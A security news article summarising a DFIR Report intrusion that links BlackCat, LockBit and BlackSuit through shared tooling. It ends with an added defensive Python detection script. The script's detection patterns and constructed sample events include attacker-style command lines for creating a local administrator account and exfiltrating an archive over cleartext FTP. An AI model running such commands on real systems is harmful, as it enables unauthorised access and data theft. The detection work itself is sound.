Intrusion Campaign Links BlackCat, LockBit, and BlackSuit Ransomware Gangs
The DFIR Report details an intrusion that connects three major ransomware operations—BlackCat/ALPHV, LockBit, and BlackSuit—through shared tooling and infrastructure.

An intrusion analyzed by The DFIR Report has revealed a campaign that blurs operational lines between three of the most prolific ransomware gangs: BlackCat/ALPHV, LockBit, and BlackSuit. The case, initially shared with customers in March 2025, demonstrates how affiliates or common access brokers may be leveraging shared infrastructure and toolkits to deploy different ransomware strains against the same victim.
The attack chain began in September 2024 when a user downloaded a malicious file masquerading as DeskSoft's EarthTime application. Instead of the legitimate timekeeping tool, the file deployed the SectopRAT remote access trojan, which established a foothold and a command-and-control (C2) tunnel via SystemBC proxy malware. The threat actor then escalated privileges by creating a new local account and granting it administrative rights, enabling lateral movement primarily through RDP connections.
Reconnaissance efforts were extensive, involving tools such as AdFind for Active Directory queries, SharpHound for directory mapping, SoftPerfect NetScan for host scanning, and Grixba—a reconnaissance utility previously tied to the Play ransomware group. Credential theft included a DCSync attack on a domain controller and PowerShell-based extraction of Veeam backup credentials. Data exfiltration was carried out by compressing targeted file shares with WinRAR and transferring the archives via WinSCP over unencrypted FTP to a US-based cloud provider, exposing credentials in transit.
On the sixth day of the intrusion, SectopRAT delivered the Betruger backdoor, a multi-function payload linked to RansomHub affiliates. However, the threat actor was evicted before any final ransomware payload was deployed. Despite this, investigators found multiple artifacts tying the operation to three distinct ransomware ecosystems: Grixba (Play/BlackSuit), Betruger (RansomHub/BlackCat), and network scans referencing a company previously hit by DragonForce ransomware.
The DFIR Report emphasizes that this case underscores the increasingly blurred boundaries between ransomware operations. Rather than a single monolithic group, the evidence points to a shared access broker or an affiliate who works across multiple gangs, deploying whichever ransomware variant suits the moment. This consolidation trend mirrors market data showing top ransomware groups capturing 71% of global attack share in early 2026.
No patches are applicable here, as the intrusion relied on credential theft and commodity malware rather than zero-day exploits. However, defenders are advised to monitor for the specific tools mentioned—SectopRAT, SystemBC, Betruger, and Grixba—and to enforce strong multifactor authentication, network segmentation, and strict monitoring of RDP and FTP traffic to detect similar cross-gang intrusions.
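As an added illustration of the monitoring advice above (not code from The DFIR Report), the following Python correlates the behaviours described in this intrusion across constructed process-creation events: a new local account then granted administrator rights, execution of the named reconnaissance tools, and an archive built with WinRAR that is then pushed over cleartext FTP with credentials in the URL. Binary names, the event schema and the sample events are assumptions for illustration.

```python
import re
from collections import defaultdict

# Tooling named in the report; binary names are assumptions for illustration
# (Grixba in particular has no fixed filename in the write-up).
RECON_TOOLS = ("adfind", "sharphound", "netscan", "grixba")
ARCHIVE_EXT = re.compile(r"\S+\.(?:rar|zip|7z)\b", re.I)
NET_USER_ADD = re.compile(r"net(?:1)?(?:\.exe)?\s+user\s+(\S+)\s+\S*\s*/add", re.I)
FTP_CREDS = re.compile(r"ftp://[^/\s:@]+:[^@\s]+@", re.I)

# Constructed process-creation events (not from the report), shaped like a
# flattened Sysmon Event ID 1 export: timestamp in seconds, host, image, command line.
SAMPLE_EVENTS = [
    {"ts": 10, "host": "WS01", "image": "net.exe", "cmd": "net user svc_bk P@ss1 /add"},
    {"ts": 12, "host": "WS01", "image": "net.exe", "cmd": "net localgroup administrators svc_bk /add"},
    {"ts": 30, "host": "WS01", "image": "AdFind.exe", "cmd": "adfind -f objectcategory=computer"},
    {"ts": 40, "host": "FS01", "image": "WinRAR.exe", "cmd": r"winrar a -r D:\out\fin.rar \\FS01\finance"},
    {"ts": 55, "host": "FS01", "image": "WinSCP.exe", "cmd": r"winscp ftp://u:pw@203.0.113.10/ /upload D:\out\fin.rar"},
    {"ts": 60, "host": "DC01", "image": "explorer.exe", "cmd": "explorer.exe"},
]

def correlate(events, window=600):
    """Return (host, finding) tuples for the behaviours described in the intrusion."""
    findings = []
    by_host = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_host[e["host"]].append(e)
    for host, evs in by_host.items():
        for i, e in enumerate(evs):
            cmd, img = e["cmd"], e["image"].lower()
            later = [x for x in evs[i + 1:] if x["ts"] - e["ts"] <= window]
            # Named reconnaissance tooling is high-signal on its own.
            if any(t in img for t in RECON_TOOLS):
                findings.append((host, f"recon tool executed: {e['image']}"))
            # New local account followed by addition to the local administrators group.
            m = NET_USER_ADD.search(cmd)
            if m:
                grp = re.compile(rf"localgroup\s+administrators\s+{re.escape(m.group(1))}\s+/add", re.I)
                if any(grp.search(x["cmd"]) for x in later):
                    findings.append((host, f"new local account {m.group(1)} granted admin rights"))
            # Archive created, then the same archive referenced in a cleartext FTP transfer.
            if "winrar" in img or img == "rar.exe":
                for archive in ARCHIVE_EXT.findall(cmd):
                    if any(archive.lower() in x["cmd"].lower() and "ftp://" in x["cmd"].lower() for x in later):
                        findings.append((host, f"archive {archive} staged and sent over FTP"))
            # Credentials embedded in an ftp:// URL travel in the clear, as in the report.
            if FTP_CREDS.search(cmd):
                findings.append((host, "credentials embedded in cleartext FTP URL"))
    return findings
```

Running `correlate(SAMPLE_EVENTS)` yields four findings, two on WS01 and two on FS01, and nothing for the benign DC01 event.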
This case illustrates a critical shift in the ransomware landscape: the rise of a fluid affiliate ecosystem where threat actors freely mix tooling from competing gangs, making attribution less meaningful and response more complex.